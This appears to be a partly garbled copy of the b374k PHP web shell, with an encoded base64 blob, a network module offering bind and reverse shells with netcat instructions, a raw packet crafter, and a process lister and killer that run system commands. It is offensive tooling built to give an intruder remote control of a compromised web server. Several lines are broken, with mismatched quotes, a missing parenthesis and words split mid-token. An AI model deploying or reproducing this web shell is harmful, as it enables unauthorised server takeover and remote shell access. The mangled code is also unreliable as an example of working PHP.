uyaD8hL11HbDxocoXjsRxCfouJkibeYU1QM0n+TP62rI6P6kHIewXmbxt159BxBmt6Hn7c7NL7r0LfiF/FfkTFP1z7U
F9gOjYqOP694ReKlG8uhCILZ4cLk2Louy9y1YDaB5GSpk0317upb584gR0DH2adCBgMvutH29dq9626VPPCPGpcig6f
pLvUOP4Cb6UC9VA9yA9fU1i+m5Vdd6SaOFYVjblJqhq/1Fkz0bTaS9VxV1UmstZ8s3b8V7qhmOa+3K1w39p5h/cP/w
oR4xhVQfHLQV7ijTbFfrqy0T0jSeWhjwNrQeRDY9fqtJiPcbZ5xED4xAdnMnHep5cq7+h79RkGq7v6q+5Hztve262b2

```

60+c9h61a6Jpb+ElkPVa9Mnax7k4Qu+Hzk/tU+ALP6+Frut4L8wvwqXOIaVMZmDCsrKJwU91e/13gGfet8EPgZ8eoae
LvXH+JpXLR8vuALdasb5sXZVPKZ7Qv+8X0qYKPCNLid6Xn7s92DbPufW/GMMQ4y1T3YhU2RP3jZoIWsTJJQvLzOb4Km
ixmIXZAohtsI0xO4Ybd9QtpMFC0r9i+Ske/biRFTNo+XMzeaXFmx0MEZvV+T2DvOL4iVjg0hnqSF5DVuA58eyHQvO+y
IH82Op3dkiTwGDvTOCLHbC54L6/aVn9bhshq5Zntv6gbVv5YFxmGjU+blLJv9Ht/Wbidvvhwa4DwsuF155mXl7pcsF
8z2VUyv8Qa7QKpuTN//d9xDa73tLPNsyUCD449KMY4uvAOH80+H+nds0OGS1F+0yc4pyit0X80iynZmCc7YbKELGsKl
RFreHr5RYkdilu0hBDWHIM7eLl j70/A8PXZlh5phiVzhtpMYTVzZ+f0sfdCTpO/riIG/POPpI3qonVcE6361Ny2w/EB
nz70s+ry23dIVLWyxzf8pRDkrdsVZ7HMeDl9LthIXqftePPJpi251ABtDHg1VWK5Gu7vOW9fBDzRFw2WWAMuBo6Xbxy
m8Fsf910SV3AZC7kGCxsJfz95ZcgEdRSerKtHRePpiaQVquF8KOOiI58XEz3BCfDlnOFnSrToCAFFE8sysXxJ05HiqT
NSd5W57YvBJU+vSqKStAMKXp+gLmOaOafL3FLpWkjGauGgDsmYpSSpJzUjbtTLx0MkvfWcQaQaf102PlacIVHBYmWw
VKhSiVWpPit8M6GfEQRRbRVLpZA/lKaQy8VpsFhEIgHB0VFXMaHB6CxiYnKAKIK8I2fmNAtLZGIoXSiRqpVifxIAQRs
kNQ6bXylhtVD6njqPGYhXKL/rqrkOLUzNW6eChDBWJF0631v7zXbbrPU+CfJMuSJHDMUVjshrxTUiXYYPFGLJAQGUg
HXX5J1kRV7s9er6GEeJJ/5NdluqRLhkvfFhs+whf0Qzspoa7d/4ysE834sgNlJxMyLgGAJxi3f8fkWwD91BKEAXCpRi
w2mgjLVBCEv6mvFowZg7+E17kdu5iyJaDK1SevypzyxoSRrrpkKhpC6T0xs6p6hr7rHmQrSbDdlNSXcpBN8IR2/Ak
TtmX7BqWzDgMlV6LC04o0jVYNw5GkAUg1c85oOWTkeHOYuDrYixI0eIWIyhhGxtT6sznm4PJMta7bQqkvbn8lt0440x
j89013VtssRWUIGuBliVcQf8yrblNgGMu2Ts7ml+pyXliaZ9LxRQtm2YQBCFaQ43F+t24sKJPh3dn91DjGTDp6rVms5
OEGKPDxnZSs0vwmZaTrWvuOdW/HJZuiNaCxbjdTU9IvkHkjVRv4xe7znX3qLvvTq+n0pMLIEffpLXVV/wE5yHZO9wEu
ojBm3BeUBicsdBXS/HLFdxYv5694BRrrVVM8LYbH7rvDb7D3V1tE3Z31dG9S9YghPlf71g+/h6peY/K573Q0EjfhutR
krnZdrPR/Nx4c/6NgpjgXpn+1AM31PabaJuLt0717TkhbaVJpCLp8vFPQyE+OdkdwGws2WN78WNC/ADMUS/EtRyKKUm
vPSrFTW8nKV1lpyRlvrXncGGpDHW/utgxRlWpM47cXIbZWK0KjyeI7vpG3cXBHx48fioKdSsvNt180JeNugNpp/G9dH
iw7Mp6FuEdP1wYwuhUTFJ6libBKCsrMZbB142LSypxWdAyEdoHZLmsqrQC3GieGkZHQBZOFhLxmeacNRRfn8UEEW6BS
Dv3/svZRg7AwtklaCK5QBKOURB3DzG/k8Ut9RRigqUKlRh83jSDIZSLpGKlWaiLY5SKNOT6cPV+LilEba+LJbAkTSiN
E6dV9/A4cQ6hcjulfbVvZmIu3Z8SvqJHrqhZmC2hymXipRuE7sLUjurA6kgukyduSZRzldDbPb3z4MkohUksLnEO4yPi
QlX1EHLwaVmetlacrDvUkqyB8Trbk/U/GZeIu3qVseyKcIN/K//lV9XLR58ezHMIkUjMLq1wxES9VCU9I1a9ivB/eOJ
MPB9CqZDWDOTaJwqSwqj jyyDdWw2ujU7fND/+iq/qlby6fnxEumy//OkMb1dGgomZhXRib9B07X1TLBsVuKr4wiwHnZ
dFqb8z+Yb8f4VCq1ZK2R6c9qAs9/eAfRmYn00uZBIXESP6YmtAnXQhg0uen5zzvTe7P1cJEsrSsvNUELSRD3unww3Wh
NDs9CypOP1sp7Rr/W1NiHDeOk7mQalcfVG5zpy246x2pU531eShXlba8dkLYsCNVihd5qwJmJTukgw4dGVsV2Z2b61P
ztu86tVUuxepD25Uq6Szi/srizBWcgzGhPAwR7Z/5GfLc2z7T0dM9if/6ADM0mFNQ9IQPp1+2JO8ec78bsd7GDAgT3
6LepLcYqCAYCC8s4KkM61Z3Xi13kctDIuZ+JalYDn9jaPD2U11ObdJQzj4yLyVC+4QOAK8BANRN5eIRWen8JWOAwNy
VyYJg+l2yTdeN3a6crkeIi3FnRAPUXKspM4Vcwc15YJH5VrTULwkp30mpyJMFZo5iKwRP4ecGx8X40QcYB5gm2KyxV
HaI8DYCmi7Yyxi7NBQoYbZpVNoC87VkfDfVHMDQYOEjSKL2BmKhG1/LHnxYcSEc06Um6OdpR6YZXcrhCzNt/O8Qhgn
TpRpVW78NVf1erdoBnNlMsh8RzdaOITCSu/p7fusfAjXE/dPkH4ppr2ALXgLPPEER7G2OwW6Z9OZ1N24MNQhe1Vj0xmI
Y+MYx6rLYR1BG010DtIjzC+bWIA+FU3QTtTvRle4hhLsPBGBYjJrRrAPVTPWEPH0y/MkC8YqIXNy2e1FgGMGMzuVYlH
T92GhoAIwDoCdYmOEDPBw2FnoAJ3euzGO01InJYhPqH0HJEE9yte5EY8fRMANJ45sUESifocFozaHmMHM5FAf0ZKTqi
1cYQpH7mVUFM/DYwLhG5b9h9Ar16GihfI3DLT4qJj5kBkwzHZ4iG+rVoUqKX6auNa202YeKQ20JDCFuzDVjZpP5VO6Q
Z9ItFEMucDQ2ghgNmflNkgm224TYiMjv+469Iu2UkpZGCljZxAc2qdoI39ncSYeIA/y//C6S0HQBE7X/EvkBjzz+wSj
Qu+RNWj8bG9v++bjOK3001H9XnqGJvAwD99pu5eW8t+631fGsjQ2PXh/J8vD1CeDxApSP0U8LoMU4KJMZ581H0jRsdH
PmWafAUQhFPkqoUKvO4ABAuhmeeTlyRSClWqQBgg+T10QzFYPRo91vM1UoVab9FYUqxGP3m0FzJ6+TXiQBfokhF//zo
HVuRlimG0dozN+f/07/5vwa=";

```

$GLOBALS['module']['network']['id'] = "network";
$GLOBALS['module']['network']['title'] = "Network";
$GLOBALS['module']['network']['js_ontabselected'] = "";
$GLOBALS['module']['network']['content'] = "
<table class='boxtbl'>
<thead>
<tr><th colspan='2'><p class='boxtitle'>Bind Shell</p></th></tr>
</thead>
<tbody>
<tr><td style='width:144px'>Server IP</td><td><input type='text' id='bindAddr' value='".$server_addr.'" disabled></td></tr>
<tr><td>Port</td><td><input type='text' id='bindPort' value='".$default_port.'" onkeydown="\<tr><td colspan='2'><pre id='bindResult'>Press ' run ' button and run ' nc server_i
p port ' on your computer</pre></td></tr>
</tbody>
</table>
<br>

```

```

<table class='boxtbl'>
<thead>
<tr><th colspan='2'><p class='boxtitle'>Reverse Shell</p></th></tr>
</thead>
<tbody>
<tr><td style='width:144px'>Target IP</td><td><input type='text' id='backAddr' value='".$remote_addr."' onkeydown="\trap_enter(event, 'rs_go_back');\"></td></tr>
<tr><td>Port</td><td><input type='text' id='backPort' value='".$default_port."' onkeydown="\trap_enter(event, 'rs_go_back');\"></td></tr>
</tbody>
<tfoot>
<tr>
<td style='width:144px;'>
<select id='backLang' class='rsType'>
".$winbinary."
</select>
</td>
<td><span class='button' onclick="\rs_go('back');\" style='width:120px;'>run</span></td>
</tr>
<tr><td colspan='2'><pre id='backResult'>Run ' nc -l -v -p port ' on your computer and press ' run ' button</pre></td></tr>
</tfoot>
</table>
<br>
<table class='boxtbl'>
<thead>
<tr><th colspan='2'><p class='boxtitle'>Simple Packet Crafter</p></th></tr>
</thead>
<tbody>
<tr><td style='width:120px'>Host</td><td><input type='text' id='packetHost' value='tcp://".$server_addr."' onkeydown="\trap_enter(event, 'packet_go');\"></td></tr>
<tr><td>Start Port</td><td><input type='text' id='packetStartPort' value='80' onkeydown="\trap_enter(event, 'packet_go');\"></td></tr>
<tr><td>End Port</td><td><input type='text' id='packetEndPort' value='80' onkeydown="\trap_enter(event, 'packet_go');\"></td></tr>
<tr><td>Connection Timeout</td><td><input type='text' id='packetTimeout' value='5' onkeydown="\trap_enter(event, 'packet_go');\"></td></tr>
<tr><td>Stream Timeout</td><td><input type='text' id='packetSTimeout' value='5' onkeydown="\trap_enter(event, 'packet_go');\"></td></tr>
</tbody>
<tfoot>
<tr><td colspan='2'><textarea id='packetContent' style='height:140px;min-height:140px;'>GET / HTTP/1.1\r\n\r\n</textarea></td></tr>
<tr>
<td>
<span class='button' onclick="\packet_go();\" style='width:120px;'>run</span>
</td>
<td>You can also press ctrl+enter to submit</td>
</tr>
<tr><td colspan='2'><div id='packetResult'></div></td></tr>
</tfoot>
</table>
";

if(isset($p['rsLang']) && isset($p['rsArgs'])) {
    $rsLang = $p['rsLang'];
    $rsArgs = $p['rsArgs'];
    $res = "";

    if($rsLang=="php") {
        $code = get_resource("rs_".$rsLang);
        if($code!==false) {
            $code = "\$target = \"".$rsArgs.\""; ?>".$code;
            $res = eval_go($rsLang, $code, "", "");
        }
    }
}

```

```

    }
    else{
        $code = get_resource("rs_". $rsLang);
        if($code!==false){
            $res = eval_go($rsLang, $code, "", $rsArgs);
        }
    }

    if($res===false) $res == "error";
    output(html_safe($res));
}
elseif(isset($p['packetTimeout'])&&isset($p['packetSTimeout'])&&isset($p['packetPort'])&&isset($p['packetContent'])){
    $packetHost = trim($p['packetHost']);
    if(!preg_match("/[a-z0-9]+\:\/\/\/*\/", $packetHost)) $packetHost = "tcp://". $packetHost;

    $packetPort = (int) $p['packetPort'];

    $packetTimeout = (int) $p['packetTimeout'];
    $packetSTimeout = (int) $p['packetSTimeout'];

    $packetContent = $p['packetContent'];
    if ctype_xdigit($packetContent) $packetContent = @pack("H*", $packetContent);
    else{
        $packetContent = str_replace(array("\r", "\n"), "", $packetContent);
        $packetContent = str_replace(array("\\r", "\\n"), array("\r", "\n"), $packetContent);
    }

    $res = "";

    $sock = fsockopen($packetHost, $packetPort, $errNo, $errStr, $packetTimeout);
    if(!$sock){
        $res .= "<div class='weak'>";
        $res .= html_safe(trim($errStr))." (error ".html_safe(trim($errNo)).")</div>";
    }
    else{
        stream_set_timeout($sock, $packetSTimeout);
        fwrite($sock, $packetContent. "\r\n\r\n\x00");
        $counter = 0;
        $maxtry = 1;
        $bin = "";
        do{
            $line = fgets($sock, 1024);
            if(trim($line)=="") $counter++;
            $bin .= $line;
        }while($counter<$maxtry);
        fclose($sock);
        $res .= "<table class='boxtbl'><tr><td><textarea style='height:140px;min-height:140px;'>".html_safe($bin)."</textarea></td></tr>";
        $res .= "<tr><td><textarea style='height:140px;min-height:140px;'>".bin2hex($bin)."</textarea></td></tr></table>";
    }

    output($res);
}

$GLOBALS['module']['processes']['id'] = "processes";
$GLOBALS['module']['processes']['title'] = "Processes";
$GLOBALS['module']['processes']['js_ontabselected'] = "show_processes()";
$GLOBALS['module']['processes']['content'] = "";

if(!function_exists('show_processes')){
    function show_processes(){
        $output = '';
    }
}

```

```

$wcount = 11;
if(is_win()){
    $cmd = "tasklist /V /FO csv";
    $wexplode = "\",\"";
}
else{
    $cmd = "ps aux";
    $wexplode = " ";
}

$res = execute($cmd);
if(trim($res)=='') return false;
else{
    $output .= "<table id='psTable' class='dataView sortable'>";
    if(!is_win()) $res = preg_replace('#\ +#',' ', $res);

    $psarr = explode("\n", $res);
    $fi = true;
    $tblcount = 0;

    $check = explode($wexplode, $psarr[0]);
    $wcount = count($check);

    foreach($psarr as $psa){
        if(trim($psa)!=''){
            if($fi){
                $fi = false;
                $psln = explode($wexplode, $psa, $wcount);
                $output .= "<tr><th class='col-cbox sorttab
le_nosort'><div class='cBoxAll'></div></th><th class='sorttable_nosort'>action</th>";
                foreach($psln as $p) $output .= "<th>".trim
(trim(strtolower($p)) , "\"")."</th>";

                $output .= "</tr>";
            }
            else{
                $psln = explode($wexplode, $psa, $wcount);
                $pid = trim(trim($psln[1]), "\"");
                $tblcount = 0;
                $output .= "<tr data-pid='".$pid."'>";

                foreach($psln as $p){
                    if(trim($p)=='') $p = " ";
                    $p = trim(trim($p) , "\"");
                    $p = html_safe($p);
                    if($tblcount == 0){
                        $output .= "<td><div class=
'cBox'></div></td><td><a class='kill'>kill</a></td><td>".$p."</td>";
                        $tblcount++;
                    }
                    else{
                        $tblcount++;
                        if($tblcount == count($psln
)) $output .= "<td style='text-align:left;'>".$p."</td>";
                        else $output .= "<td style=
'text-align:center;'>".$p."</td>";
                    }
                }
                $output .= "</tr>";
            }
        }
    }

    $colspan = count($psln)+1;
    $colspanAll = $colspan+1;
    $output .= "<tfoot><tr><td><div class='cBoxAll'></div></td><td cols
pan=".$colspan." style='text-align:left;'><span class='button' onclick='kill_selected();' s
tyle='margin-right:8px;'>kill selected</span><span class='button' onclick='show_processes()
;'>refresh</span><span class='psSelected'></span></td></tr></tfoot></table>";
}
}

```



```
        return $output;
    }
}

if(isset($p['showProcesses'])){
    $processes = show_processes();
    if($processes!==false) output($processes);
    output('error');
}
elseif(isset($p['allPid'])){
    $allPid = explode(" ", $p['allPid']);
    $counter = 0;
    foreach($allPid as $pid){
        $pid = trim($pid);
        if(!empty($pid)){
            if(function_exists("posix_kill")){
                if(posix_kill($pid,'9')) $counter++;
            }
            else{
                if(is_win()){
                    $cmd = execute("taskkill /F /PID ".$pid);
                    $cmd = execute("tasklist /FI \"PID eq ".$pid.\" \");
                    if(strpos($cmd,"No tasks are running")!==false) $co
unter++;
                }
                else{
                    $cmd = execute("kill -9 ".$pid);
                    if((strpos($cmd, "such process")===false)&&(strpos(
$cmd, "not permitted")===false)){
                        $cmd = trim(execute("ps -p ".$pid));
                        $check = explode("\n", $cmd);
                        if(count($check)==1) $counter++;
                    }
                }
            }
        }
    }
    if($counter>0) output($counter);
    else output('error');
}

$error = @ob_get_contents();
$error_html = (!empty($error))?"<pre class='phpError border'>".str_replace("\n\n",
"\n", html_safe($error))."</pre>":"";
@ob_end_clean();
error_reporting(0);
@ini_set('display_errors','0');
```

```
?><!doctype html>
<html>
<head>
<title><?php echo $GLOBALS['title']." ".$GLOBALS['ver'];?></title>
<meta charset='utf-8'>
<meta name='robots' content='noindex, nofollow, noarchive'>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, us
er-scalable=no, user-scalable=0">
<link rel='SHORTCUT ICON' href='<?php echo get_resource('b374k');?>'>
<style type="text/css">
@font-face {
    font-family:'ubuntumono';
    src:url(data:application/x-font-woff;charset=utf-8;base64,d09GRgABAAAAAGkYAA8AAAAAp
+gAAQABAAAAAAAAAAAAAAAAAAAAAAAAABGRlRnAAABWAAAAABwAAAAcXhqiC09TLzIAAAAF0AAAAAXAAAAGCIf+2fY21h
cAAAAdAAAAGQAAAB8qDpr+VjdnQgAAADYAAAAI4AAAIIC3AUx2ZwZ20AAAPwAAADewAABiN2vUTEZ2FzcAAAB2wAAAA
IAAAACP//AANnbHlMAAAHdAAAWX4AAI8gtk/BKGhlyWQAAGD0AAAAAMgAAADb2ffhhaGhlyQAAYSgAAAAdAAAAJAU1Ap
5obXR4AABhSAAAAQ8AAAG8JqQbMGxvY2EAAGJYAAABtgAAAbbgHbwybWF4cAAAZBAAAAAgAAAAIAb/CJxuYW1lAABkM
AAAAhwAAAWUD/sQynBvc3QAAGZMAAABeAAAAhhGAhH0cHJlcAAAZ8QAAAFtAAABipI+L6QAAAAABAAAAAMmJbzEAAAAA
```

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
